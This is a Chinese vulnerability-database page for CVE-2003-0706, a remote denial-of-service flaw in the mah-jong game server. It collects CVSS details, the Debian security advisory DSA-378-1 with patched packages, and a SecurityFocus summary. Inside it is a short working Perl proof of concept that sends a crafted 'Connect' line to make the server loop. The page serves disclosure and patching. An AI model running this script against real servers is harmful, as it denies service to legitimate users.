CVE-2003-0706
CVSS5.0
发布时间 :2003-09-17 00:00:00
修订时间 :2008-09-10 15:20:13
NMCOEPS    

[原文]Unknown vulnerability in mah-jong 1.5.6 and earlier allows remote attackers to cause a denial of service (tight loop).


[CNNVD]Mah-Jong Server未明远程拒绝服务攻击漏洞(CNNVD-200309-009)

        
        Mah-Jong Server是一款基于网络的游戏服务程序。
        Mah-Jong Server存在未明拒绝服务攻击问题,远程攻击者可以利用这个漏洞使mah-jong服务器产生无限循环而停止对正常服务的响应。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0706
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0706
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-009
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2003/dsa-378
(PATCH)  DEBIAN  DSA-378

- 漏洞信息

Mah-Jong Server未明远程拒绝服务攻击漏洞
中危 其他
2003-09-17 00:00:00 2005-10-20 00:00:00
远程  
        
        Mah-Jong Server是一款基于网络的游戏服务程序。
        Mah-Jong Server存在未明拒绝服务攻击问题,远程攻击者可以利用这个漏洞使mah-jong服务器产生无限循环而停止对正常服务的响应。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-378

- 漏洞信息 (23116)

Mah-Jong 1.4/1.6 Server Remote Denial Of Service Vulnerability (EDBID:23116)
linux dos
2003-09-07 Verified
0 jsk
N/A [点击下载]
source: http://www.securityfocus.com/bid/8558/info

A remote denial of service vulnerability has been reported to affect the mah-jong game server. The issue has been reported to be exploitable so that a remote attacker may trigger a tight loop in the affected mah-jong server. This will cause the game server to be unresponsive to further commands, effectively denying service to legitimate users. 

#!/usr/bin/perl -s
use IO::Socket;
# test it in slackware 9.0
# DOS-test--mj1.6--code by jsk
# mahJong 1.6, all versions of mahjong
if(!$ARGV[0] || !$ARGV[1])
 { print "usage: ./dosmj.pl <host> <port>\n"; exit(-1); }

$host = $ARGV[0];
$port = $ARGV[1];
$jsk ="Connect 1034 0";
$socket = new IO::Socket::INET (
 Proto => "tcp",
 PeerAddr => $host,
 PeerPort => $port);

die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "Connect 1034 0";
print $socket "\r\n";
close($socket);
		

- 漏洞信息 (F31607)

DSA-378-1 (PacketStormID:F31607)
2003-09-10 00:00:00
Matt Zimmerman,Nicolas Boullis  debian.org
advisory,remote,denial of service,vulnerability
linux,debian
CVE-2003-0705,CVE-2003-0706
[点击下载]

Debian Security Advisory DSA 378-1 - Two vulnerabilities have been found in the Mah-Jong server version 1.4 and below. One enables a remote attacker to gain privileges of the user running the server while the other leads to a denial of service.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 378-1                     security@debian.org
http://www.debian.org/security/                             Matt Zimmerman
September 7th, 2003                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mah-jong
Vulnerability  : buffer overflows, denial of service
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2003-0705 CAN-2003-0706

Nicolas Boullis discovered two vulnerabilities in mah-jong, a
network-enabled game.

 - CAN-2003-0705 (buffer overflow)

   This vulnerability could be exploited by a remote attacker to
   execute arbitrary code with the privileges of the user running the
   mah-jong server.

- - CAN-2003-0706 (denial of service)

  This vulnerability could be exploited by a remote attacker to cause
  the mah-jong server to enter a tight loop and stop responding to
  commands.

For the stable distribution (woody) these problems have been fixed in
version 1.4-2.

For the unstable distribution (sid) these problems have been fixed in
version 1.5.6-2.

We recommend that you update your mah-jong package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2.dsc
      Size/MD5 checksum:      579 b473dfb32c1765f3b96a1d4897a728a5
    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2.diff.gz
      Size/MD5 checksum:    23814 c0465cd149b6f9bfc7f0096ab5d0d192
    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4.orig.tar.gz
      Size/MD5 checksum:   259474 21cc99ddb9ae91cbe02b2119586f8860

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_alpha.deb
      Size/MD5 checksum:   311378 0ff83a703283cad7faa06609d330d9ef

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_arm.deb
      Size/MD5 checksum:   272324 e6974d354918f6f4d0dffa3bb3eb4b9f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_i386.deb
      Size/MD5 checksum:   250012 a4f7d586918c3a712d073aa9e8e42bd5

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_ia64.deb
      Size/MD5 checksum:   379856 b63ee72a1a2f4ac16e902ae0f8b5b3e1

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_hppa.deb
      Size/MD5 checksum:   286728 c4c544f15f09199b753848cb7ee417d9

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_m68k.deb
      Size/MD5 checksum:   234410 91682fc41ab6fb8b57ebfb09681f3180

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_mips.deb
      Size/MD5 checksum:   261874 977e1d059bbaca988a3cb60636e74d17

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_mipsel.deb
      Size/MD5 checksum:   261666 45e1785dd5c17dcbec971fc8024b8787

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_powerpc.deb
      Size/MD5 checksum:   271566 5d25f219fdb987ca014775ae4ae9ee9c

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_s390.deb
      Size/MD5 checksum:   246116 be071c93713eb1257f9a8b8225968ad8

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_sparc.deb
      Size/MD5 checksum:   269392 78b122c5b4145b039dda06d4e16cfe48

  These files will probably be moved into the stable distribution on
  its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/W7VAArxCt0PiXR4RAlMPAJ9oD49qKrE9OK4LEHnVtA4dCfcM+QCcDPk/
w5fxjmEjVzpNWzgcO/lBpsQ=
=t7CW
-----END PGP SIGNATURE-----
    

- 漏洞信息

6587
mah-jong Tight Loop Remote DoS
Remote / Network Access Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-09-07 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Mah-Jong Server Remote Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 8558
Yes No
2003-09-07 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Nicolas Boullis.

- 受影响的程序版本

Nicolas Boullis Mah-Jong 1.6
Nicolas Boullis Mah-Jong 1.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha

- 漏洞讨论

A remote denial of service vulnerability has been reported to affect the mah-jong game server. The issue has been reported to be exploitable so that a remote attacker may trigger a tight loop in the affected mah-jong server. This will cause the game server to be unresponsive to further commands, effectively denying service to legitimate users.

- 漏洞利用

An exploit has been made available by jsk &lt;jsk@ph4nt0m.net&gt;:

- 解决方案

Debian have released an advisory (DSA 378-1), which contains fixes to address this issue. Affected users are advised to upgrade as soon as possible. Further details regarding applying fixes are available in the referenced advisory.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站